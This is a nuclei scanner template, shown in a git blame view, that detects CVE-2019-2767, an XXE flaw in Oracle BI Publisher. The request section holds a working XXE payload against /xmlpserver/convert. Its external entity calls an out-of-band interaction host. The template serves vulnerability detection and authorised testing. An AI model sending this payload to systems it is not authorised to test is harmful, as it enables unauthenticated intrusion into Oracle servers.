nuclei-templates/cves/2019/CVE-2019-2767.yaml

28 lines
1.1 KiB
YAML
Raw Normal View History

2021-06-08 16:19:35 +00:00
id: CVE-2019-2767
info:
2021-06-08 19:53:13 +00:00
name: Oracle Business Intelligence - Publisher XXE
2021-06-08 16:19:35 +00:00
author: madrobot
severity: high
description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
2021-10-18 20:40:26 +00:00
tags: cve,cve2019,oracle,xxe,oast
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.20
cve-id: CVE-2019-2767
2021-06-08 16:19:35 +00:00
requests:
2021-06-08 16:22:58 +00:00
- raw:
- |
2021-06-08 16:29:59 +00:00
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
2021-06-08 16:22:58 +00:00
Host: {{Hostname}}
2021-06-08 16:19:35 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
2021-06-08 16:19:35 +00:00
words:
- "http"